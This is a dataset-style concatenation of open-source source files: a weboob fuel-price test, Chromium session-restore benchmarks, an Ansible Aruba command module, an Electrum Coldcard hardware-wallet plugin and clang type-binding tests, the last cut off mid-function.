# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
class PrixCarburantsTest(BackendTest):
BACKEND = 'prixcarburants'
def test_prixcarburants(self):
products = list(self.backend.search_products('gpl'))
self.assertTrue(len(products) == 1)
prices = list(self.backend.iter_prices(products[0]))
self.backend.fillobj(prices[0])
| agpl-3.0 |
CyanogenMod/android_external_chromium_org | tools/perf/benchmarks/session_restore.py | 8 | 2414 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tempfile
from measurements import session_restore
from measurements import session_restore_with_url
import page_sets
from profile_creators import small_profile_creator
from telemetry import test
from telemetry.page import profile_generator
class _SessionRestoreTest(test.Test):
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
super(_SessionRestoreTest, cls).ProcessCommandLineArgs(parser, args)
profile_type = 'small_profile'
if not args.browser_options.profile_dir:
profile_dir = os.path.join(tempfile.gettempdir(), profile_type)
if not os.path.exists(profile_dir):
new_args = args.Copy()
new_args.pageset_repeat = 1
new_args.output_dir = profile_dir
profile_generator.GenerateProfiles(
small_profile_creator.SmallProfileCreator, profile_type, new_args)
args.browser_options.profile_dir = os.path.join(profile_dir, profile_type)
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreColdTypical25(_SessionRestoreTest):
tag = 'cold'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWarmTypical25(_SessionRestoreTest):
tag = 'warm'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'warm': True,
'pageset_repeat': 20}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlCold(_SessionRestoreTest):
"""Measure Chrome cold session restore with startup URLs."""
tag = 'cold'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlWarm(_SessionRestoreTest):
"""Measure Chrome warm session restore with startup URLs."""
tag = 'warm'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'warm': True,
'pageset_repeat': 10}
| bsd-3-clause |
daenamkim/ansible | lib/ansible/modules/network/aruba/aruba_command.py | 17 | 6873 | #!/usr/bin/python
#
# Copyright: Ansible Team
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aruba_command
version_added: "2.4"
author: "James Mighion (@jmighion)"
short_description: Run commands on remote devices running Aruba Mobility Controller
description:
- Sends arbitrary commands to an aruba node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(aruba_config) to configure Aruba devices.
extends_documentation_fragment: aruba
options:
commands:
description:
- List of commands to send to the remote aruba device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of retries, the task fails.
See examples.
required: false
default: null
aliases: ['waitfor']
match:
description:
- The I(match) argument is used in conjunction with the
I(wait_for) argument to specify the match policy. Valid
values are C(all) or C(any). If the value is set to C(all)
then all conditionals in the wait_for must be satisfied. If
the value is set to C(any) then only one of the values must be
satisfied.
required: false
default: all
choices: ['any', 'all']
retries:
description:
- Specifies the number of retries a command should by tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
tasks:
- name: run show version on remote devices
aruba_command:
commands: show version
- name: run show version and check to see if output contains Aruba
aruba_command:
commands: show version
wait_for: result[0] contains Aruba
- name: run multiple commands on remote nodes
aruba_command:
commands:
- show version
- show interfaces
- name: run multiple commands and evaluate the output
aruba_command:
commands:
- show version
- show interfaces
wait_for:
- result[0] contains Aruba
- result[1] contains Loopback0
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.network.aruba.aruba import run_commands
from ansible.module_utils.network.aruba.aruba import aruba_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
for item in stdout:
if isinstance(item, string_types):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='aruba_command does not support running config mode '
'commands. Please use aruba_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
commands=dict(type='list', required=True),
wait_for=dict(type='list', aliases=['waitfor']),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(aruba_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
msg = 'One or more conditional statements have not be satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result.update({
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
})
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
fujicoin/electrum-fjc | electrum/plugins/coldcard/coldcard.py | 2 | 26391 | #
# Coldcard Electrum plugin main code.
#
#
from struct import pack, unpack
import os, sys, time, io
import traceback
from electrum.bip32 import BIP32Node, InvalidMasterKeyVersionBytes
from electrum.i18n import _
from electrum.plugin import Device
from electrum.keystore import Hardware_KeyStore, xpubkey_to_pubkey, Xpub
from electrum.transaction import Transaction
from electrum.wallet import Standard_Wallet
from electrum.crypto import hash_160
from electrum.util import bfh, bh2u, versiontuple, UserFacingException
from electrum.base_wizard import ScriptTypeNotSupported
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import LibraryFoundButUnusable
_logger = get_logger(__name__)
try:
import hid
from ckcc.protocol import CCProtocolPacker, CCProtocolUnpacker
from ckcc.protocol import CCProtoError, CCUserRefused, CCBusyError
from ckcc.constants import (MAX_MSG_LEN, MAX_BLK_LEN, MSG_SIGNING_MAX_LENGTH, MAX_TXN_LEN,
AF_CLASSIC, AF_P2SH, AF_P2WPKH, AF_P2WSH, AF_P2WPKH_P2SH, AF_P2WSH_P2SH)
from ckcc.constants import (
PSBT_GLOBAL_UNSIGNED_TX, PSBT_IN_NON_WITNESS_UTXO, PSBT_IN_WITNESS_UTXO,
PSBT_IN_SIGHASH_TYPE, PSBT_IN_REDEEM_SCRIPT, PSBT_IN_WITNESS_SCRIPT,
PSBT_IN_BIP32_DERIVATION, PSBT_OUT_BIP32_DERIVATION, PSBT_OUT_REDEEM_SCRIPT)
from ckcc.client import ColdcardDevice, COINKITE_VID, CKCC_PID, CKCC_SIMULATOR_PATH
requirements_ok = True
class ElectrumColdcardDevice(ColdcardDevice):
# avoid use of pycoin for MiTM message signature test
def mitm_verify(self, sig, expect_xpub):
# verify a signature (65 bytes) over the session key, using the master bip32 node
# - customized to use specific EC library of Electrum.
pubkey = BIP32Node.from_xkey(expect_xpub).eckey
try:
pubkey.verify_message_hash(sig[1:65], self.session_key)
return True
except:
return False
except ImportError:
requirements_ok = False
COINKITE_VID = 0xd13e
CKCC_PID = 0xcc10
CKCC_SIMULATED_PID = CKCC_PID ^ 0x55aa
def my_var_int(l):
# Bitcoin serialization of integers... directly into binary!
if l < 253:
return pack("B", l)
elif l < 0x10000:
return pack("<BH", 253, l)
elif l < 0x100000000:
return pack("<BI", 254, l)
else:
return pack("<BQ", 255, l)
def xfp_from_xpub(xpub):
# sometime we need to BIP32 fingerprint value: 4 bytes of ripemd(sha256(pubkey))
# UNTESTED
kk = bfh(Xpub.get_pubkey_from_xpub(xpub, []))
assert len(kk) == 33
xfp, = unpack('<I', hash_160(kk)[0:4])
return xfp
class CKCCClient:
# Challenge: I haven't found anywhere that defines a base class for this 'client',
# nor an API (interface) to be met. Winging it. Gets called from lib/plugins.py mostly?
def __init__(self, plugin, handler, dev_path, is_simulator=False):
self.device = plugin.device
self.handler = handler
# if we know what the (xfp, xpub) "should be" then track it here
self._expected_device = None
if is_simulator:
self.dev = ElectrumColdcardDevice(dev_path, encrypt=True)
else:
# open the real HID device
import hid
hd = hid.device(path=dev_path)
hd.open_path(dev_path)
self.dev = ElectrumColdcardDevice(dev=hd, encrypt=True)
# NOTE: MiTM test is delayed until we have a hint as to what XPUB we
# should expect. It's also kinda slow.
def __repr__(self):
return '<CKCCClient: xfp=%08x label=%r>' % (self.dev.master_fingerprint,
self.label())
def verify_connection(self, expected_xfp, expected_xpub):
ex = (expected_xfp, expected_xpub)
if self._expected_device == ex:
# all is as expected
return
if ( (self._expected_device is not None)
or (self.dev.master_fingerprint != expected_xfp)
or (self.dev.master_xpub != expected_xpub)):
# probably indicating programing error, not hacking
_logger.info(f"xpubs. reported by device: {self.dev.master_xpub}. "
f"stored in file: {expected_xpub}")
raise RuntimeError("Expecting 0x%08x but that's not what's connected?!" %
expected_xfp)
# check signature over session key
# - mitm might have lied about xfp and xpub up to here
# - important that we use value capture at wallet creation time, not some value
# we read over USB today
self.dev.check_mitm(expected_xpub=expected_xpub)
self._expected_device = ex
_logger.info("Successfully verified against MiTM")
def is_pairable(self):
# can't do anything w/ devices that aren't setup (but not normally reachable)
return bool(self.dev.master_xpub)
def timeout(self, cutoff):
# nothing to do?
pass
def close(self):
# close the HID device (so can be reused)
self.dev.close()
self.dev = None
def is_initialized(self):
return bool(self.dev.master_xpub)
def label(self):
# 'label' of this Coldcard. Warning: gets saved into wallet file, which might
# not be encrypted, so better for privacy if based on xpub/fingerprint rather than
# USB serial number.
if self.dev.is_simulator:
lab = 'Coldcard Simulator 0x%08x' % self.dev.master_fingerprint
elif not self.dev.master_fingerprint:
# failback; not expected
lab = 'Coldcard #' + self.dev.serial
else:
lab = 'Coldcard 0x%08x' % self.dev.master_fingerprint
# Hack zone: during initial setup I need the xfp and master xpub but
# very few objects are passed between the various steps of base_wizard.
# Solution: return a string with some hidden metadata
# - see <https://stackoverflow.com/questions/7172772/abc-for-string>
# - needs to work w/ deepcopy
class LabelStr(str):
def __new__(cls, s, xfp=None, xpub=None):
self = super().__new__(cls, str(s))
self.xfp = getattr(s, 'xfp', xfp)
self.xpub = getattr(s, 'xpub', xpub)
return self
return LabelStr(lab, self.dev.master_fingerprint, self.dev.master_xpub)
def has_usable_connection_with_device(self):
# Do end-to-end ping test
try:
self.ping_check()
return True
except:
return False
def get_xpub(self, bip32_path, xtype):
assert xtype in ColdcardPlugin.SUPPORTED_XTYPES
_logger.info('Derive xtype = %r' % xtype)
xpub = self.dev.send_recv(CCProtocolPacker.get_xpub(bip32_path), timeout=5000)
# TODO handle timeout?
# change type of xpub to the requested type
try:
node = BIP32Node.from_xkey(xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(_('Invalid xpub magic. Make sure your {} device is set to the correct chain.')
.format(self.device)) from None
if xtype != 'standard':
xpub = node._replace(xtype=xtype).to_xpub()
return xpub
def ping_check(self):
# check connection is working
assert self.dev.session_key, 'not encrypted?'
req = b'1234 Electrum Plugin 4321' # free up to 59 bytes
try:
echo = self.dev.send_recv(CCProtocolPacker.ping(req))
assert echo == req
except:
raise RuntimeError("Communication trouble with Coldcard")
def show_address(self, path, addr_fmt):
# prompt user w/ addres, also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_address(path, addr_fmt), timeout=None)
def get_version(self):
# gives list of strings
return self.dev.send_recv(CCProtocolPacker.version(), timeout=1000).split('\n')
def sign_message_start(self, path, msg):
# this starts the UX experience.
self.dev.send_recv(CCProtocolPacker.sign_message(msg, path), timeout=None)
def sign_message_poll(self):
# poll device... if user has approved, will get tuple: (addr, sig) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_msg(), timeout=None)
def sign_transaction_start(self, raw_psbt, finalize=True):
# Multiple steps to sign:
# - upload binary
# - start signing UX
# - wait for coldcard to complete process, or have it refused.
# - download resulting txn
assert 20 <= len(raw_psbt) < MAX_TXN_LEN, 'PSBT is too big'
dlen, chk = self.dev.upload_file(raw_psbt)
resp = self.dev.send_recv(CCProtocolPacker.sign_transaction(dlen, chk, finalize=finalize),
timeout=None)
if resp != None:
raise ValueError(resp)
def sign_transaction_poll(self):
# poll device... if user has approved, will get tuple: (legnth, checksum) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_txn(), timeout=None)
def download_file(self, length, checksum, file_number=1):
# get a file
return self.dev.download_file(length, checksum, file_number=file_number)
class Coldcard_KeyStore(Hardware_KeyStore):
hw_type = 'coldcard'
device = 'Coldcard'
def __init__(self, d):
Hardware_KeyStore.__init__(self, d)
# Errors and other user interaction is done through the wallet's
# handler. The handler is per-window and preserved across
# device reconnects
self.force_watching_only = False
self.ux_busy = False
# Seems like only the derivation path and resulting **derived** xpub is stored in
# the wallet file... however, we need to know at least the fingerprint of the master
# xpub to verify against MiTM, and also so we can put the right value into the subkey paths
# of PSBT files that might be generated offline.
# - save the fingerprint of the master xpub, as "xfp"
# - it's a LE32 int, but hex more natural way to see it
# - device reports these value during encryption setup process
lab = d['label']
if hasattr(lab, 'xfp'):
# initial setup
self.ckcc_xfp = lab.xfp
self.ckcc_xpub = lab.xpub
else:
# wallet load: fatal if missing, we need them!
self.ckcc_xfp = d['ckcc_xfp']
self.ckcc_xpub = d['ckcc_xpub']
def dump(self):
# our additions to the stored data about keystore -- only during creation?
d = Hardware_KeyStore.dump(self)
d['ckcc_xfp'] = self.ckcc_xfp
d['ckcc_xpub'] = self.ckcc_xpub
return d
def get_derivation(self):
return self.derivation
def get_client(self):
# called when user tries to do something like view address, sign somthing.
# - not called during probing/setup
rv = self.plugin.get_client(self)
if rv:
rv.verify_connection(self.ckcc_xfp, self.ckcc_xpub)
return rv
def give_error(self, message, clear_client=False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def wrap_busy(func):
# decorator: function takes over the UX on the device.
def wrapper(self, *args, **kwargs):
try:
self.ux_busy = True
return func(self, *args, **kwargs)
finally:
self.ux_busy = False
return wrapper
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(_('Encryption and decryption are currently not supported for {}').format(self.device))
@wrap_busy
def sign_message(self, sequence, message, password):
# Sign a message on device. Since we have big screen, of course we
# have to show the message unabiguously there first!
try:
msg = message.encode('ascii', errors='strict')
assert 1 <= len(msg) <= MSG_SIGNING_MAX_LENGTH
except (UnicodeError, AssertionError):
# there are other restrictions on message content,
# but let the device enforce and report those
self.handler.show_error('Only short (%d max) ASCII messages can be signed.'
% MSG_SIGNING_MAX_LENGTH)
return b''
client = self.get_client()
path = self.get_derivation() + ("/%d/%d" % sequence)
try:
cl = self.get_client()
try:
self.handler.show_message("Signing message (using %s)..." % path)
cl.sign_message_start(path, msg)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = cl.sign_message_poll()
if resp is not None:
break
finally:
self.handler.finished()
assert len(resp) == 2
addr, raw_sig = resp
# already encoded in Bitcoin fashion, binary.
assert 40 < len(raw_sig) <= 65
return raw_sig
except (CCUserRefused, CCBusyError) as exc:
self.handler.show_error(str(exc))
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except Exception as e:
self.give_error(e, True)
# give empty bytes for error cases; it seems to clear the old signature box
return b''
def build_psbt(self, tx: Transaction, wallet=None, xfp=None):
# Render a PSBT file, for upload to Coldcard.
#
if xfp is None:
# need fingerprint of MASTER xpub, not the derived key
xfp = self.ckcc_xfp
inputs = tx.inputs()
if 'prev_tx' not in inputs[0]:
# fetch info about inputs, if needed?
# - needed during export PSBT flow, not normal online signing
assert wallet, 'need wallet reference'
wallet.add_hw_info(tx)
# wallet.add_hw_info installs this attr
assert tx.output_info is not None, 'need data about outputs'
# Build map of pubkey needed as derivation from master, in PSBT binary format
# 1) binary version of the common subpath for all keys
# m/ => fingerprint LE32
# a/b/c => ints
base_path = pack('<I', xfp)
for x in self.get_derivation()[2:].split('/'):
if x.endswith("'"):
x = int(x[:-1]) | 0x80000000
else:
x = int(x)
base_path += pack('<I', x)
# 2) all used keys in transaction
subkeys = {}
derivations = self.get_tx_derivations(tx)
for xpubkey in derivations:
pubkey = xpubkey_to_pubkey(xpubkey)
# assuming depth two, non-harded: change + index
aa, bb = derivations[xpubkey]
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
subkeys[bfh(pubkey)] = base_path + pack('<II', aa, bb)
for txin in inputs:
if txin['type'] == 'coinbase':
self.give_error("Coinbase not supported")
if txin['type'] in ['p2sh', 'p2wsh-p2sh', 'p2wsh']:
self.give_error('No support yet for inputs of type: ' + txin['type'])
# Construct PSBT from start to finish.
out_fd = io.BytesIO()
out_fd.write(b'psbt\xff')
def write_kv(ktype, val, key=b''):
# serialize helper: write w/ size and key byte
out_fd.write(my_var_int(1 + len(key)))
out_fd.write(bytes([ktype]) + key)
if isinstance(val, str):
val = bfh(val)
out_fd.write(my_var_int(len(val)))
out_fd.write(val)
# global section: just the unsigned txn
class CustomTXSerialization(Transaction):
@classmethod
def input_script(cls, txin, estimate_size=False):
return ''
unsigned = bfh(CustomTXSerialization(tx.serialize()).serialize_to_network(witness=False))
write_kv(PSBT_GLOBAL_UNSIGNED_TX, unsigned)
# end globals section
out_fd.write(b'\x00')
# inputs section
for txin in inputs:
if Transaction.is_segwit_input(txin):
utxo = txin['prev_tx'].outputs()[txin['prevout_n']]
spendable = txin['prev_tx'].serialize_output(utxo)
write_kv(PSBT_IN_WITNESS_UTXO, spendable)
else:
write_kv(PSBT_IN_NON_WITNESS_UTXO, str(txin['prev_tx']))
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
pubkeys = [bfh(k) for k in pubkeys]
for k in pubkeys:
write_kv(PSBT_IN_BIP32_DERIVATION, subkeys[k], k)
if txin['type'] == 'p2wpkh-p2sh':
assert len(pubkeys) == 1, 'can be only one redeem script per input'
pa = hash_160(k)
assert len(pa) == 20
write_kv(PSBT_IN_REDEEM_SCRIPT, b'\x00\x14'+pa)
out_fd.write(b'\x00')
# outputs section
for o in tx.outputs():
# can be empty, but must be present, and helpful to show change inputs
# wallet.add_hw_info() adds some data about change outputs into tx.output_info
if o.address in tx.output_info:
# this address "is_mine" but might not be change (I like to sent to myself)
output_info = tx.output_info.get(o.address)
index, xpubs = output_info.address_index, output_info.sorted_xpubs
if index[0] == 1 and len(index) == 2:
# it is a change output (based on our standard derivation path)
assert len(xpubs) == 1 # not expecting multisig
xpubkey = xpubs[0]
# document its bip32 derivation in output section
aa, bb = index
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
deriv = base_path + pack('<II', aa, bb)
pubkey = bfh(self.get_pubkey_from_xpub(xpubkey, index))
write_kv(PSBT_OUT_BIP32_DERIVATION, deriv, pubkey)
if output_info.script_type == 'p2wpkh-p2sh':
pa = hash_160(pubkey)
assert len(pa) == 20
write_kv(PSBT_OUT_REDEEM_SCRIPT, b'\x00\x14' + pa)
out_fd.write(b'\x00')
return out_fd.getvalue()
@wrap_busy
def sign_transaction(self, tx, password):
# Build a PSBT in memory, upload it for signing.
# - we can also work offline (without paired device present)
if tx.is_complete():
return
client = self.get_client()
assert client.dev.master_fingerprint == self.ckcc_xfp
raw_psbt = self.build_psbt(tx)
#open('debug.psbt', 'wb').write(out_fd.getvalue())
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction_start(raw_psbt, True)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = client.sign_transaction_poll()
if resp is not None:
break
rlen, rsha = resp
# download the resulting txn.
new_raw = client.download_file(rlen, rsha)
finally:
self.handler.finished()
except (CCUserRefused, CCBusyError) as exc:
self.logger.info(f'Did not sign: {exc}')
self.handler.show_error(str(exc))
return
except BaseException as e:
self.logger.exception('')
self.give_error(e, True)
return
# trust the coldcard to re-searilize final product right?
tx.update(bh2u(new_raw))
@staticmethod
def _encode_txin_type(txin_type):
# Map from Electrum code names to our code numbers.
return {'standard': AF_CLASSIC, 'p2pkh': AF_CLASSIC,
'p2sh': AF_P2SH,
'p2wpkh-p2sh': AF_P2WPKH_P2SH,
'p2wpkh': AF_P2WPKH,
'p2wsh-p2sh': AF_P2WSH_P2SH,
'p2wsh': AF_P2WSH,
}[txin_type]
@wrap_busy
def show_address(self, sequence, txin_type):
client = self.get_client()
address_path = self.get_derivation()[2:] + "/%d/%d"%sequence
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
class ColdcardPlugin(HW_PluginBase):
keystore_class = Coldcard_KeyStore
minimum_library = (0, 7, 2)
client = None
DEVICE_IDS = [
(COINKITE_VID, CKCC_PID),
(COINKITE_VID, CKCC_SIMULATED_PID)
]
#SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
SUPPORTED_XTYPES = ('standard', 'p2wpkh', 'p2wpkh-p2sh')
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS)
self.device_manager().register_enumerate_func(self.detect_simulator)
def get_library_version(self):
import ckcc
try:
version = ckcc.__version__
except AttributeError:
version = 'unknown'
if requirements_ok:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def detect_simulator(self):
# if there is a simulator running on this machine,
# return details about it so it's offered as a pairing choice
fn = CKCC_SIMULATOR_PATH
if os.path.exists(fn):
return [Device(path=fn,
interface_number=-1,
id_=fn,
product_key=(COINKITE_VID, CKCC_SIMULATED_PID),
usage_page=0,
transport_ui_string='simulator')]
return []
def create_client(self, device, handler):
if handler:
self.handler = handler
# We are given a HID device, or at least some details about it.
# Not sure why not we aren't just given a HID library handle, but
# the 'path' is unabiguous, so we'll use that.
try:
rv = CKCCClient(self, handler, device.path,
is_simulator=(device.product_key[1] == CKCC_SIMULATED_PID))
return rv
except:
self.logger.info('late failure connecting to device?')
return None
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
client.handler = self.create_handler(wizard)
def get_xpub(self, device_id, derivation, xtype, wizard):
# this seems to be part of the pairing process only, not during normal ops?
# base_wizard:on_hw_derivation
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = self.create_handler(wizard)
client.ping_check()
xpub = client.get_xpub(derivation, xtype)
return xpub
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
#if client:
# client.used()
if client is not None:
client.ping_check()
return client
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
# Standard_Wallet => not multisig, must be bip32
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
sequence = wallet.get_address_index(address)
txin_type = wallet.get_txin_type(address)
keystore.show_address(sequence, txin_type)
# EOF
| mit |
ah744/ScaffCC_RKQC | clang/bindings/python/tests/cindex/test_type.py | 5 | 7493 | from clang.cindex import CursorKind
from clang.cindex import TypeKind
from nose.tools import raises
from .util import get_cursor
from .util import get_tu
kInput = """\
typedef int I;
struct teststruct {
int a;
I b;
long c;
unsigned long d;
signed long e;
const int f;
int *g;
int ***h;
};
"""
def test_a_struct():
tu = get_tu(kInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Could not find teststruct."
fields = list(teststruct.get_children())
assert all(x.kind == CursorKind.FIELD_DECL for x in fields)
assert fields[0].spelling == 'a'
assert not fields[0].type.is_const_qualified()
assert fields[0].type.kind == TypeKind.INT
assert fields[0].type.get_canonical().kind == TypeKind.INT
assert fields[1].spelling == 'b'
assert not fields[1].type.is_const_qualified()
assert fields[1].type.kind == TypeKind.TYPEDEF
assert fields[1].type.get_canonical().kind == TypeKind.INT
assert fields[1].type.get_declaration().spelling == 'I'
assert fields[2].spelling == 'c'
assert not fields[2].type.is_const_qualified()
assert fields[2].type.kind == TypeKind.LONG
assert fields[2].type.get_canonical().kind == TypeKind.LONG
assert fields[3].spelling == 'd'
assert not fields[3].type.is_const_qualified()
assert fields[3].type.kind == TypeKind.ULONG
assert fields[3].type.get_canonical().kind == TypeKind.ULONG
assert fields[4].spelling == 'e'
assert not fields[4].type.is_const_qualified()
assert fields[4].type.kind == TypeKind.LONG
assert fields[4].type.get_canonical().kind == TypeKind.LONG
assert fields[5].spelling == 'f'
assert fields[5].type.is_const_qualified()
assert fields[5].type.kind == TypeKind.INT
assert fields[5].type.get_canonical().kind == TypeKind.INT
assert fields[6].spelling == 'g'
assert not fields[6].type.is_const_qualified()
assert fields[6].type.kind == TypeKind.POINTER
assert fields[6].type.get_pointee().kind == TypeKind.INT
assert fields[7].spelling == 'h'
assert not fields[7].type.is_const_qualified()
assert fields[7].type.kind == TypeKind.POINTER
assert fields[7].type.get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().get_pointee().kind == TypeKind.INT
constarrayInput="""
struct teststruct {
void *A[2];
};
"""
def testConstantArray():
tu = get_tu(constarrayInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Didn't find teststruct??"
fields = list(teststruct.get_children())
assert fields[0].spelling == 'A'
assert fields[0].type.kind == TypeKind.CONSTANTARRAY
assert fields[0].type.get_array_element_type() is not None
assert fields[0].type.get_array_element_type().kind == TypeKind.POINTER
assert fields[0].type.get_array_size() == 2
def test_equal():
"""Ensure equivalence operators work on Type."""
source = 'int a; int b; void *v;'
tu = get_tu(source)
a = get_cursor(tu, 'a')
b = get_cursor(tu, 'b')
v = get_cursor(tu, 'v')
assert a is not None
assert b is not None
assert v is not None
assert a.type == b.type
assert a.type != v.type
assert a.type != None
assert a.type != 'foo'
def test_typekind_spelling():
"""Ensure TypeKind.spelling works."""
tu = get_tu('int a;')
a = get_cursor(tu, 'a')
assert a is not None
assert a.type.kind.spelling == 'Int'
def test_function_argument_types():
"""Ensure that Type.argument_types() works as expected."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert args is not None
assert len(args) == 2
t0 = args[0]
assert t0 is not None
assert t0.kind == TypeKind.INT
t1 = args[1]
assert t1 is not None
assert t1.kind == TypeKind.INT
args2 = list(args)
assert len(args2) == 2
assert t0 == args2[0]
assert t1 == args2[1]
@raises(TypeError)
def test_argument_types_string_key():
"""Ensure that non-int keys raise a TypeError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert len(args) == 2
args['foo']
@raises(IndexError)
def test_argument_types_negative_index():
"""Ensure that negative indexes on argument_types Raises an IndexError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[-1]
@raises(IndexError)
def test_argument_types_overflow_index():
"""Ensure that indexes beyond the length of Type.argument_types() raise."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[2]
@raises(Exception)
def test_argument_types_invalid_type():
"""Ensure that obtaining argument_types on a Type without them raises."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.type.argument_types()
def test_is_pod():
"""Ensure Type.is_pod() works."""
